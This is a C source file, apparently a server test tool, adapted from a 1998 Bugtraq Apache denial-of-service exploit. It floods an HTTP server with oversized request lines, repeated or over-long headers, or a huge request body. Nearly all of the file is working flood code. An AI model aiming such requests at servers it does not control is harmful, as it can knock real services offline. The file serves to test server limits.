1/**************************************************************
2 * test_limits.c
3 *
4 * A simple program for sending abusive requests to a server, based
5 * on the sioux.c exploit code that this nimrod posted (see below).
6 * Roy added options for testing long header fieldsize (-t h), long
7 * request-lines (-t r), and a long request body (-t b).
8 *
9 * FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2:
10 *   gcc -o test_limits test_limits.c
11 *
12 * Solaris 2.5.1:
13 *   gcc -o test_limits test_limits.c -lsocket -lnsl
14 *
15 *
16 * Message-ID: <861zqspvtw.fsf@niobe.ewox.org>
17 * Date: Fri, 7 Aug 1998 19:04:27 +0200
18 * Sender: Bugtraq List <BUGTRAQ@netspace.org>
19 * From: Dag-Erling Coidan =?ISO-8859-1?Q?Sm=F8rgrav?= <finrod@EWOX.ORG>
20 * Subject:      YA Apache DoS attack
21 *
22 * Copyright (c) 1998 Dag-Erling Codan Smrgrav
23 * All rights reserved.
24 *
25 * Redistribution and use in source and binary forms, with or without
26 * modification, are permitted provided that the following conditions
27 * are met:
28 * 1. Redistributions of source code must retain the above copyright
29 *    notice, this list of conditions and the following disclaimer
30 *    in this position and unchanged.
31 * 2. Redistributions in binary form must reproduce the above copyright
32 *    notice, this list of conditions and the following disclaimer in the
33 *    documentation and/or other materials provided with the distribution.
34 * 3. The name of the author may not be used to endorse or promote products
35 *    derived from this software withough specific prior written permission
36 *
37 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
38 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
39 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
40 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
41 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
42 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
43 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
44 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
45 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
46 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
47 *
48 */
49
50/*
51 * Kudos to Mark Huizer who originally suggested this on freebsd-current
52 */
53
54#include <sys/types.h>
55#include <sys/uio.h>
56
57#include <sys/socket.h>
58#include <netinet/in.h>
59
60#include <netdb.h>
61#include <stdio.h>
62#include <stdlib.h>
63#include <string.h>
64#include <unistd.h>
65
66#define TEST_LONG_REQUEST_LINE      1
67#define TEST_LONG_REQUEST_FIELDS    2
68#define TEST_LONG_REQUEST_FIELDSIZE 3
69#define TEST_LONG_REQUEST_BODY      4
70
71void
72usage(void)
73{
74    fprintf(stderr,
75      "usage: test_limits [-t (r|n|h|b)] [-a address] [-p port] [-n num]\n");
76    exit(1);
77}
78
79int
80main(int argc, char *argv[])
81{
82    struct sockaddr_in sin;
83    struct hostent *he;
84    FILE *f;
85    int o, sd;
86
87    /* default parameters */
88    char *addr = "localhost";
89    int port = 80;
90    int num = 1000;
91    int testtype = TEST_LONG_REQUEST_FIELDS;
92
93    /* get options */
94    while ((o = getopt(argc, argv, "t:a:p:n:")) != EOF)
95        switch (o) {
96        case 't':
97            if (*optarg == 'r')
98                testtype = TEST_LONG_REQUEST_LINE;
99            else if (*optarg == 'n')
100                testtype = TEST_LONG_REQUEST_FIELDS;
101            else if (*optarg == 'h')
102                testtype = TEST_LONG_REQUEST_FIELDSIZE;
103            else if (*optarg == 'b')
104                testtype = TEST_LONG_REQUEST_BODY;
105            break;
106        case 'a':
107            addr = optarg;
108            break;
109        case 'p':
110            port = atoi(optarg);
111            break;
112        case 'n':
113            num = atoi(optarg);
114            break;
115        default:
116            usage();
117        }
118
119    if (argc != optind)
120        usage();
121
122    /* connect */
123    if ((he = gethostbyname(addr)) == NULL) {
124        perror("gethostbyname");
125        exit(1);
126    }
127    bzero(&sin, sizeof(sin));
128    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
129    sin.sin_family = he->h_addrtype;
130    sin.sin_port = htons(port);
131
132    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
133        perror("socket");
134        exit(1);
135    }
136
137    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
138        perror("connect");
139        exit(1);
140    }
141
142    if ((f = fdopen(sd, "r+")) == NULL) {
143        perror("fdopen");
144        exit(1);
145    }
146
147    /* attack! */
148    fprintf(stderr, "Testing like a plague of locusts on %s\n", addr);
149
150    if (testtype == TEST_LONG_REQUEST_LINE) {
151        fprintf(f, "GET ");
152        while (num-- && !ferror(f)) {
153            fprintf(f, "/123456789");
154            fflush(f);
155        }
156        fprintf(f, " HTTP/1.0\r\n\r\n");
157    }
158    else {
159        fprintf(f, "GET /fred/foo HTTP/1.0\r\n");
160
161        if (testtype == TEST_LONG_REQUEST_FIELDSIZE) {
162            while (num-- && !ferror(f)) {
163                fprintf(f, "User-Agent: sioux");
164                fflush(f);
165            }
166            fprintf(f, "\r\n");
167        }
168        else if (testtype == TEST_LONG_REQUEST_FIELDS) {
169            while (num-- && !ferror(f))
170                fprintf(f, "User-Agent: sioux\r\n");
171            fprintf(f, "\r\n");
172        }
173        else if (testtype == TEST_LONG_REQUEST_BODY) {
174            fprintf(f, "User-Agent: sioux\r\n");
175            fprintf(f, "Content-Length: 33554433\r\n");
176            fprintf(f, "\r\n");
177            while (num-- && !ferror(f))
178                fprintf(f, "User-Agent: sioux\r\n");
179        }
180        else {
181            fprintf(f, "\r\n");
182        }
183    }
184    fflush(f);
185
186    {
187        apr_ssize_t len;
188        char buff[512];
189
190        while ((len = read(sd, buff, 512)) > 0)
191            len = write(1, buff, len);
192    }
193    if (ferror(f)) {
194        perror("fprintf");
195        exit(1);
196    }
197
198    fclose(f);
199    exit(0);
200}
201